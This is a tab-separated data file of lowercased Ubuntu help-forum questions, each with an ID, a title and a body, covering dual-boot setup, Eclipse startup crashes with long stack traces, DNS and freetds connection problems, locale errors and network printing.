432418	is there any software that can interface between linux and apple ?	as far as i can tell there is nothing an iphone or other apple device can link up with ubuntu but is the any can kind of bridging software that will work and if not is there any development project for it on the horizon ?
432420	recursively copy ( and rename ) files to their own same directory with another name	this q and a will cover a very specific yet common case : given many files with the same or similar name each in its own directory , create a copy of each of them in their original directory but with another name . you might wonder which rare case would require such operation . it 's not so rare . some emerging software , expecially those based on the mvc ( model / view / controller ) design pattern may require the programmer to implement the various components each in a different directory . example : software root | | -- model = > mycustomcomponent.php | | -- view = > mycustomcomponent.php | | -- controller = > mycustomcomponent.php | \ -- translations | | -- english = > mycustomcomponent.php | | -- french = > mycustomcomponent.php | | -- italian = > mycustomcomponent.php | | -- spanish = > mycustomcomponent.php | an example of a quite famous software implementing such structure would be the popular e-commerce application opencart . but there are many others . a common practice is to create new components by copying an existing one or a core one , apply variations and save them . in case inheritance and similar ca n't help us , we end up having to duplicate 10-20 files . an utterly boring and error prone process . this is a typical example : from a bank transfer script implement a direct debit script by using the former as `` boilerplate code '' ( do n't bash me , i did not create this architecture ) . between translations , model , view and controller management and others , the number of files to copy each in its deep directory quickly becomes cumbersome .
432424	blank screen - not showing startup/bios screen	i have an older acer m460 w/ 2 gb of ram . i loaded the latest version of ubuntu and everything ran well . i am running an amd 5450 video card . i loaded the amd catalyst drivers and started cgminer . after running for a 2 - 3 hours i noticed the computer locked up . i rebooted and received a blank screen . not even the startup/bios screen displayed . i removed the graphics card and tried using the onboard card but still no success . any ideas ? ? ?
432430	ca n't boot cant do anything	i did everything written here http : //www.everydaylinuxuser.com/2013/09/install-ubuntu-linux-alongside-windows.html ? m=1 and when finished installing ubuntu i rebooted my laptop and chose `` windows 8 loader '' . but it tells me you ca n't boot windows 8 . i turned the laptop off and booted into ubuntu and run boot repair . when it finished , i write down this on a paper http : //paste.ubuntu.com/7069803/ then i rebooted my laptop but it gave me : error : file '/boot/grub/i386-pc/normal.mod ' not found entering rescue mode ... i insert my live usb and the same thing happens . is there any solution ? the boot repair cd didnt launch so i enter the bios settings and enabled the efi boot . and when i reboot it boot to win8 directly i dnt know what to do now any suggestion
432434	how to do a completely clean installation of ubuntu touch on huawei ascend p1	i have a huawei ascend p1 android device , and would like to install ubuntu touch onto it . however , i am not good in linux , and i do not have any linux machines . i only have both a desktop and laptop running on windows xp pro . any experts out there can assist and advise whether can i flash my huawei ascend p1 to ubuntu touch o/s , without keeping the android o/s , on or using my windows xp platform ? if possible , please provide me detailed steps and instructions . many thanks .
432435	my dvd player keeps freezing for 1 second when playing a disney dvd - why ?	running ubuntu 12.04 on an asus all in one downloaded from internet , and installed via software centre , libdvdcss2_1.2.13-0_amd64 libdvdcss-dev_1.2.13-0_amd64 libdvdread4_4.2.1-2ubuntu1_amd64 not sure whether the problem is because i was supposed to install the 2 codes rather than 3 ? i do n't know how to take one off if this is the problem . be very grateful for help - and with any step by step instructions . thanks john
432436	tsql connection refused - host command dns resolve issue in local network	i am using vmware starter and running 2 guest vms , ubuntu and windows xp professional . the host system is windows 7 . windows xp professional hosts mssql database , ubuntu talks to it using freetds . unfortunately i can not connect using : tsql -s windog -u sa because it fails : password : locale is `` en_gb.utf-8 '' locale charset is `` utf-8 '' using default charset `` utf-8 '' error 20009 ( severity 9 ) : unable to connect : adaptive server is unavailable or does not exist os error 111 , `` connection refused '' there was a problem connecting to the server i 've found nice page that describes how to debug the tsql issues : http : //www.freetds.org/userguide/confirminstall.htm i 've found that problem is that `` host '' linux command which tsql probably relies on does not respect the entries in /etc/hosts . > host 9e37f01ab has address 81.200.64.50 host 9e37f01ab not found : 3 ( nxdomain ) above ip looks like is my isp fallback ip for not found dns entries . however ping resolve the ip to 192.168.0.7 ( which is correct ) my configs looks like this : /etc/hosts 192.168.0.7 9e37f01ab /etc/freetds/freetds.conf [ windog ] host = 9e37f01ab instance = sql2008express port = 1433 tds version = 7.0 client charset = utf-8 how do i manage that to work with not too much hassle ? previously it worked , but i 've had the router on openwrt with dnsmasq running , so it was adding all my network machine hostnames to the router dns .
432437	can i download a video in mp3 format using youtube-dl ?	i am using ubuntu 12.04 lts and i was wondering if there is a way in which we can download youtube to mp3 using youtube-dl ?
432438	is there a way to get smarty syntax highlight in gedit ?	i 'm using smarty to develop a website and i need syntax highlighting . currently gedit only highlights the html . since my tpl files contains only html and smarty template functions . i 've google 'd for this functionality and found this solution posted on github , but i did n't get it to work . does anyone have a solution for this ? i just want a basic editor i do n't care for fancy stuff that eclipse and other programs have . i just want a text editor with syntax highlighting .
432439	access point wg602v4 not detected via ethernet	i 've got an ap netgear wg602v4 that work well via wifi but is n't detected via ethernet . i 've to set up the password but my ubuntu 14 ca n't see it ( win7 in another pc too ) . i do n't know what to do . i 've tried many ethernet cables but the problem persist .
432441	ca n't detect rabbitvcs on ubutu 12.04	i installed rabbitvcs according to the steps inside the following instructor . i added the rabbitvcs ppa : deb http : //ppa.launchpad.net/rabbitvcs/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/rabbitvcs/ppa/ubuntu precise main i apt-get updated and then apt-get installed the following packets : $ : dpkg -- get-selections | grep -v deinstall | grep rabbitvcs rabbitvcs-cli install rabbitvcs-core install rabbitvcs-gedit install rabbitvcs-nautilus3 install i did restart my ubuntu . but still , i ca n't find any memory of rabbitvcs when i see subversioned folders , or when i press right click on a folder . i got wubi ubuntu 12.04 . $ : cat /proc/version linux version 3.8.0-35-generic ( buildd @ allspice ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 i searched for solutions for this problem , but it seems that no one had this specific problem . thanks .
432446	how to build an arm ( linaro ) image in ubuntu 13.10 ?	i am trying to build a linaro image following this blog : http : //fullshovel.wordpress.com/2012/06/18/new-life-into-a-linaro-based-server-image/ ( i have also tried to follow the instructions in : https : //wiki.linaro.org/platform/devplatform/crosscompile/livebuild ) i am getting the following output : lb build -- verbose [ 2014-03-10 22:55:37 ] lb_build -- verbose [ 2014-03-10 22:55:37 ] lb_bootstrap -- verbose p : setting up cleanup function [ 2014-03-10 22:55:37 ] lb_bootstrap_cache restore -- verbose w : skipping /usr/lib/live/build/lb_bootstrap_cache , foreign architecture ( s ) . [ 2014-03-10 22:55:37 ] lb_bootstrap_copy -- verbose [ 2014-03-10 22:55:37 ] lb_bootstrap_cdebootstrap -- verbose [ 2014-03-10 22:55:37 ] lb_bootstrap_debootstrap -- verbose [ 2014-03-10 22:55:37 ] lb_bootstrap_cache save -- verbose w : skipping /usr/lib/live/build/lb_bootstrap_cache , foreign architecture ( s ) . p : begin unmounting filesystems ... p : saving caches ... [ 2014-03-10 22:55:38 ] lb_chroot -- verbose p : setting up cleanup function [ 2014-03-10 22:55:38 ] lb_chroot_cache restore -- verbose [ 2014-03-10 22:55:38 ] lb_chroot_devpts install -- verbose [ 2014-03-10 22:55:38 ] lb_testroot e : lb_chroot_devpts : one of .build/config .build/bootstrap is missing p : begin unmounting filesystems ... p : saving caches ... i there is no .build directory in the directory where i execute lb build . what is going on ? i tried using -- verbose and -- debug but lb does not give any more information about why it fails . what dependency do i have to install for this to work ? i am using ubuntu 13.10 and lb version 3.0~a57-1 .
432447	windows 7 / ubuntu dual-boot with shared data partition	i have a laptop running windows 7 64-bit home premium on an intel core i5 processor . the laptop has 4 gb ram and a 640 gb hard drive . i would like to install ubuntu in a dual-boot configuration such that there is a partition for data that is accessible regardless of whether i boot into windows or ubuntu . besides the windows , ubuntu , and shared data partitions , any recommendations of other partitions that would optimize performance would be appreciated . i 've searched the forum and can not find any posts that have this ( or somewhat similar ) partition scheme . any help would be appreciated . also , i know you can run ubuntu from a dvd or a usb stick , but can you install from a usb stick rather than a dvd ?
432448	eclipse kepler wo n't start	hi am trying to learn about developing andoid apps using ubuntu 12.04lts and eclipse kepler . had it all downloaded and set up which took ages . tried to run an example and it crashed eclipse . now eclipse does the splash screen then an error message comes up referring to the file below : ! session 2014-03-11 10:08:17.323 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=4.3.2.m20140221-1700 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_nz framework arguments : -product org.eclipse.epp.package.standard.product command-line arguments : -os linux -ws gtk -arch x86_64 -product org.eclipse.epp.package.standard.product ! entry org.eclipse.osgi 4 0 2014-03-11 10:08:53.775 ! message application error ! stack 1 java.lang.linkageerror : error reading class bytes : org.eclipse.e4.core.internal.services.eclipseadapter at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:558 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclassimpl ( classpathmanager.java:492 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclass ( classpathmanager.java:465 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.findlocalclass ( defaultclassloader.java:216 ) at org.eclipse.osgi.internal.loader.bundleloader.findlocalclass ( bundleloader.java:395 ) at org.eclipse.osgi.internal.loader.singlesourcepackage.loadclass ( singlesourcepackage.java:35 ) at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:461 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:421 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:412 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( classloader.java:358 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultheadlesscontext ( e4application.java:450 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultcontext ( e4application.java:463 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createe4workbench ( e4application.java:199 ) at org.eclipse.ui.internal.workbench $ 5.run ( workbench.java:581 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:567 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:150 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:354 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:181 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:636 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:591 ) at org.eclipse.equinox.launcher.main.run ( main.java:1450 ) at org.eclipse.equinox.launcher.main.main ( main.java:1426 ) caused by : java.util.zip.zipexception : invalid distance too far back at java.util.zip.inflaterinputstream.read ( inflaterinputstream.java:164 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundleentry $ zipbundleentryinputstream.read ( zipbundleentry.java:157 ) at org.eclipse.osgi.internal.baseadaptor.adaptorutil.getbytes ( adaptorutil.java:247 ) at org.eclipse.osgi.baseadaptor.bundlefile.bundleentry.getbytes ( bundleentry.java:96 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:554 ) ... 31 more ! session 2014-03-11 10:49:46.805 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=4.3.2.m20140221-1700 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_nz framework arguments : -product org.eclipse.epp.package.standard.product command-line arguments : -os linux -ws gtk -arch x86_64 -product org.eclipse.epp.package.standard.product ! entry org.eclipse.osgi 4 0 2014-03-11 10:49:50.801 ! message application error ! stack 1 java.lang.linkageerror : error reading class bytes : org.eclipse.e4.core.internal.services.eclipseadapter at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:558 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclassimpl ( classpathmanager.java:492 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclass ( classpathmanager.java:465 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.findlocalclass ( defaultclassloader.java:216 ) at org.eclipse.osgi.internal.loader.bundleloader.findlocalclass ( bundleloader.java:395 ) at org.eclipse.osgi.internal.loader.singlesourcepackage.loadclass ( singlesourcepackage.java:35 ) at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:461 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:421 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:412 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( classloader.java:358 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultheadlesscontext ( e4application.java:450 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultcontext ( e4application.java:463 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createe4workbench ( e4application.java:199 ) at org.eclipse.ui.internal.workbench $ 5.run ( workbench.java:581 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:567 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:150 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:354 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:181 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:636 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:591 ) at org.eclipse.equinox.launcher.main.run ( main.java:1450 ) at org.eclipse.equinox.launcher.main.main ( main.java:1426 ) caused by : java.util.zip.zipexception : invalid distance too far back at java.util.zip.inflaterinputstream.read ( inflaterinputstream.java:164 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundleentry $ zipbundleentryinputstream.read ( zipbundleentry.java:157 ) at org.eclipse.osgi.internal.baseadaptor.adaptorutil.getbytes ( adaptorutil.java:247 ) at org.eclipse.osgi.baseadaptor.bundlefile.bundleentry.getbytes ( bundleentry.java:96 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:554 ) ... 31 more ! session 2014-03-11 10:50:41.308 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=4.3.2.m20140221-1700 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_nz framework arguments : -product org.eclipse.epp.package.standard.product command-line arguments : -os linux -ws gtk -arch x86_64 -product org.eclipse.epp.package.standard.product ! entry org.eclipse.osgi 4 0 2014-03-11 10:50:48.115 ! message application error ! stack 1 java.lang.linkageerror : error reading class bytes : org.eclipse.e4.core.internal.services.eclipseadapter at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:558 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclassimpl ( classpathmanager.java:492 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclass ( classpathmanager.java:465 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.findlocalclass ( defaultclassloader.java:216 ) at org.eclipse.osgi.internal.loader.bundleloader.findlocalclass ( bundleloader.java:395 ) at org.eclipse.osgi.internal.loader.singlesourcepackage.loadclass ( singlesourcepackage.java:35 ) at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:461 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:421 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:412 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( classloader.java:358 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultheadlesscontext ( e4application.java:450 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultcontext ( e4application.java:463 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createe4workbench ( e4application.java:199 ) at org.eclipse.ui.internal.workbench $ 5.run ( workbench.java:581 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:567 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:150 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:354 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:181 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:636 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:591 ) at org.eclipse.equinox.launcher.main.run ( main.java:1450 ) at org.eclipse.equinox.launcher.main.main ( main.java:1426 ) caused by : java.util.zip.zipexception : invalid distance too far back at java.util.zip.inflaterinputstream.read ( inflaterinputstream.java:164 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundleentry $ zipbundleentryinputstream.read ( zipbundleentry.java:157 ) at org.eclipse.osgi.internal.baseadaptor.adaptorutil.getbytes ( adaptorutil.java:247 ) at org.eclipse.osgi.baseadaptor.bundlefile.bundleentry.getbytes ( bundleentry.java:96 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:554 ) ... 31 more ! session 2014-03-11 10:54:08.659 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=4.3.2.m20140221-1700 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_nz framework arguments : -product org.eclipse.epp.package.standard.product command-line arguments : -os linux -ws gtk -arch x86_64 -product org.eclipse.epp.package.standard.product ! entry org.eclipse.osgi 4 0 2014-03-11 10:54:12.495 ! message application error ! stack 1 java.lang.linkageerror : error reading class bytes : org.eclipse.e4.core.internal.services.eclipseadapter at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:558 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclassimpl ( classpathmanager.java:492 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclass ( classpathmanager.java:465 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.findlocalclass ( defaultclassloader.java:216 ) at org.eclipse.osgi.internal.loader.bundleloader.findlocalclass ( bundleloader.java:395 ) at org.eclipse.osgi.internal.loader.singlesourcepackage.loadclass ( singlesourcepackage.java:35 ) at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:461 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:421 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:412 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( classloader.java:358 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultheadlesscontext ( e4application.java:450 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultcontext ( e4application.java:463 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createe4workbench ( e4application.java:199 ) at org.eclipse.ui.internal.workbench $ 5.run ( workbench.java:581 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:567 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:150 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:354 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:181 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:636 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:591 ) at org.eclipse.equinox.launcher.main.run ( main.java:1450 ) at org.eclipse.equinox.launcher.main.main ( main.java:1426 ) caused by : java.util.zip.zipexception : invalid distance too far back at java.util.zip.inflaterinputstream.read ( inflaterinputstream.java:164 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundleentry $ zipbundleentryinputstream.read ( zipbundleentry.java:157 ) at org.eclipse.osgi.internal.baseadaptor.adaptorutil.getbytes ( adaptorutil.java:247 ) at org.eclipse.osgi.baseadaptor.bundlefile.bundleentry.getbytes ( bundleentry.java:96 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:554 ) ... 31 more ! session 2014-03-11 10:54:51.432 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=4.3.2.m20140221-1700 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_nz framework arguments : -product org.eclipse.epp.package.standard.product command-line arguments : -os linux -ws gtk -arch x86_64 -product org.eclipse.epp.package.standard.product ! entry org.eclipse.osgi 4 0 2014-03-11 10:55:01.654 ! message application error ! stack 1 java.lang.linkageerror : error reading class bytes : org.eclipse.e4.core.internal.services.eclipseadapter at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:558 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclassimpl ( classpathmanager.java:492 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclass ( classpathmanager.java:465 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.findlocalclass ( defaultclassloader.java:216 ) at org.eclipse.osgi.internal.loader.bundleloader.findlocalclass ( bundleloader.java:395 ) at org.eclipse.osgi.internal.loader.singlesourcepackage.loadclass ( singlesourcepackage.java:35 ) at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:461 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:421 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:412 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( classloader.java:358 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultheadlesscontext ( e4application.java:450 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createdefaultcontext ( e4application.java:463 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application.createe4workbench ( e4application.java:199 ) at org.eclipse.ui.internal.workbench $ 5.run ( workbench.java:581 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:567 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:150 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:354 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:181 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:636 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:591 ) at org.eclipse.equinox.launcher.main.run ( main.java:1450 ) at org.eclipse.equinox.launcher.main.main ( main.java:1426 ) caused by : java.util.zip.zipexception : invalid distance too far back at java.util.zip.inflaterinputstream.read ( inflaterinputstream.java:164 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundleentry $ zipbundleentryinputstream.read ( zipbundleentry.java:157 ) at org.eclipse.osgi.internal.baseadaptor.adaptorutil.getbytes ( adaptorutil.java:247 ) at org.eclipse.osgi.baseadaptor.bundlefile.bundleentry.getbytes ( bundleentry.java:96 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findclassimpl ( classpathmanager.java:554 ) ... 31 more
432449	how to allow ip forwarding out of source interface	i have enabled ubuntu for ip forwarding , and that works . however , sometimes the routing table has a next hop out of the same interface the packet came in on . it triggers an icmp redirect as expected , so i disabled sending icmp redirects , and that worked . now the machine just seems to drop the packet . any way to prevent this behavior ?
432453	copy/paste produces wrong codepage characters	when i copy/paste text into nano on a console window ( ctrl+alt+f2 ) , the braces and brackets are converted to german umlaut characters . it 's fine in a terminal running on the graphical desktop . that 's probably because a german keyboard was detected during installation and i want a german keyboard . how to make copy/paste work ? output of locale : lang=en_us.utf-8 language=en_us lc_ctype= '' en_us.utf-8 '' lc_numeric=de_de.utf-8 lc_time=de_de.utf-8 lc_collate= '' en_us.utf-8 '' lc_monetary=de_de.utf-8 lc_messages= '' en_us.utf-8 '' lc_paper=de_de.utf-8 lc_name=de_de.utf-8 lc_address=de_de.utf-8 lc_telephone=de_de.utf-8 lc_measurement=de_de.utf-8 lc_identification=de_de.utf-8 lc_all= output of update-locale lang=de-de.utf-8 : *** update-locale : error : invalid locale settings : lc_telephone= '' de_de.utf-8 '' lc_monetary= '' de_de.utf-8 '' lc_address= '' de_de.utf-8 '' lc_paper= '' de_de.utf-8 '' lc_name= '' de_de.utf-8 '' lc_numeric= '' de_de.utf-8 '' lc_measurement= '' de_de.utf-8 '' lc_time= '' de_de.utf-8 '' lang=de-de.utf-8 lc_identification= '' de_de.utf-8 '' vmware workstation 10.0 , vmware tools installed ubuntu 13.10 desktop 32 bit , almost clean installation , 1 day ago
432459	is there photoshop for ubuntu 12.04 ?	i was wondering that if there is photoshop download for ubuntu 12.04 lts . any free version is nice : ) thanks guys .
432464	network printing in ubuntu 12.04 lts	i recently installed ubuntu 12.04 lts on my laptop , and would like to be able to print to a printer that is running through a windows 7 desktop ( e.g. , the commands are sent via wifi to the desktop and via ethernet from the desktop to the printer ) . i was able to find the printer with sudo system-config-printer easily enough , but when i tried to print the test page , it pulled an error about the filetype not being recognized . is this because of the printer setup , or because of a user error on my end with ubuntu ? if it is a user error , how can i fix it ? -thanks in advance !
432465	how do i profile ( and possibly control ) demands on my gpu ?	my gpu gets ungodly hot very quickly and i would like to see what is pushing it , how hard it is being pushed and then make an informed choice about upgrade , adding cooling or reconfiguring . how do i profile my gpu 's use and the applications making demands upon it ? i 'm using : 12.04 ( precise ) [ 64-bit ] it 's a geforce gt that i want to profile .
432471	how can i install windows 7 alongside ubuntu ?	i am a new user of ubuntu . a while ago attempted to install ubuntu alongside windows 7 but it did n't work . it installed ubuntu but deleted all the windows file and i did everything correctly . now , i am new to the ubuntu world and i like the os and i would like to keep it and learn more but since my desktop is not used only by me , i need to install windows 7 to dual-boot alongside ubuntu . is there any guide on how to do that ? i have got only one usb stick to save something and i do n't even know how to download the windows iso file .
